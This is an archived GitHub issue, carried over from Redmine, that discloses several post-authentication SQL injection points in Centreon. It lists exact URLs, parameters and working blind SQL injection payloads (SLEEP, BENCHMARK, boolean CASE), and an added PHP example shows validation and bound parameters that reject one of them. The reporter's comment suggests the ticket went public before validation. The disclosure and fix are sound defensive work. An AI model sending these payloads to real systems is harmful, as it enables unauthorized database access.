This repository has been archived by the owner on Dec 13, 2022. It is now read-only.

SQL Injections #2449

Closed
centreon opened this issue Jun 30, 2015 · 1 comment
@centreon
Collaborator


Author Name: Louis Ferret (Louis Ferret)
Original Redmine Issue: 6452, https://forge.centreon.com/issues/6452
Original Date: 2015-06-30


Here are some pages which allow SQL injections:

Method: POST
URL: /centreon/include/home/customView/action.php
Parameter: user_id[]
Payload: user_id[]=18 AND (SELECT * FROM (SELECT(SLEEP(5))) YGTW)
Comments:

  • Post authentication
  • AND/OR time-based blind SQL injection

Method: GET
URL: /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=&sid=[Number]&actiontype=0
Parameter: host_id
Payloads:

  • host_id=14 RLIKE (SELECT (CASE WHEN (6703=6703) THEN 14 ELSE 0x28 END))
  • host_id=14 AND (SELECT * FROM (SELECT (SLEEP(3))) ZaDF)

Comments:

  • Post authentication
  • Boolean-based blind SQL injection
  • AND/OR time-based blind SQL injection

Method: GET
URL: /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=[Number]&search=erer&num=0&limit=30&sort_type=host_name&order=ASC&p=20102&time=[Number]&criticality=0
Parameter: order
Payloads:

  • ASC, (SELECT * FROM (SELECT(SLEEP(20)))a)
  • -1629 OR 8329=BENCHMARK(3000000,MD5(0x584f4a6f))

Comment:

  • Post authentication

Method: GET
URL: /centreon/include/views/graphs/GetXmlTree.php?search_host=&search_service=&sid=[Number]&uid=[Number]&id=[ID]
Parameter: sid
Payload: '+(SELECT * FROM(SELECT(SLEEP(20)))a)+'
Comments:

  • Post authentication
  • AND/OR time-based blind SQL injection

Method: POST
URL: /centreon/main.php?p=3
Parameter: host
Payload: 14 AND (SELECT * FROM (SELECT (SLEEP(10)))a)--
Comments:

  • Post authentication
  • AND/OR time-based blind SQL injection

Note that I am copying this by hand so I may write a few typos from time to time.
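
Added example, not part of the original report and not Centreon's code: the parameters reported above are numeric ids, an id array (`user_id[]`) and a sort direction (`order`), so one way to close this class of bug is strict validation plus bound parameters, with an allow-list for the parts of a query that cannot be bound. The helper names, the `hosts` table and the combined `fetchHosts` handler are hypothetical, and the SQLite data is constructed for the demo.

```php
<?php
declare(strict_types=1);
// Added example (PHP 8+). Helper, table and column names are hypothetical.

/** Accept only a short decimal string; everything else is rejected, not "cleaned". */
function requireId(mixed $raw): int
{
    if (!is_string($raw) || preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        throw new InvalidArgumentException('id must be a decimal integer');
    }
    return (int) $raw;
}

/** Array parameters such as user_id[] are validated element by element. */
function requireIdList(mixed $raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('expected a non-empty list of ids');
    }
    return array_map('requireId', array_values($raw));
}

/** Identifiers and ASC/DESC cannot be bound, so map input onto a fixed allow-list. */
function requireChoice(mixed $raw, array $allowed): string
{
    if (!is_string($raw) || !in_array($raw, $allowed, true)) {
        throw new InvalidArgumentException('value not in allow-list');
    }
    return $raw;
}

function fetchHosts(PDO $db, array $get): array
{
    $ids    = requireIdList($get['host_id'] ?? null);
    $column = requireChoice($get['sort_type'] ?? 'host_name', ['host_name', 'host_id']);
    $order  = requireChoice($get['order'] ?? 'ASC', ['ASC', 'DESC']);
    // Values travel as bound parameters; only allow-listed tokens are interpolated.
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt  = $db->prepare("SELECT host_id, host_name FROM hosts WHERE host_id IN ($marks) ORDER BY $column $order");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE hosts (host_id INTEGER PRIMARY KEY, host_name TEXT)");
$db->exec("INSERT INTO hosts VALUES (14, 'srv-a'), (18, 'srv-b')");

var_dump(count(fetchHosts($db, ['host_id' => ['18', '14'], 'order' => 'DESC'])));
// The reported `order` value from this issue is refused before any SQL is built.
try {
    fetchHosts($db, ['host_id' => ['14'], 'order' => 'ASC, (SELECT * FROM (SELECT(SLEEP(20)))a)']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```
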

@centreon
Collaborator Author


Original Redmine Comment
Author Name: Louis Ferret (Louis Ferret)
Original Date: 2015-06-30T17:27:57Z


Didn't think it would be published without validation, you should delete this ticket and keep the description.
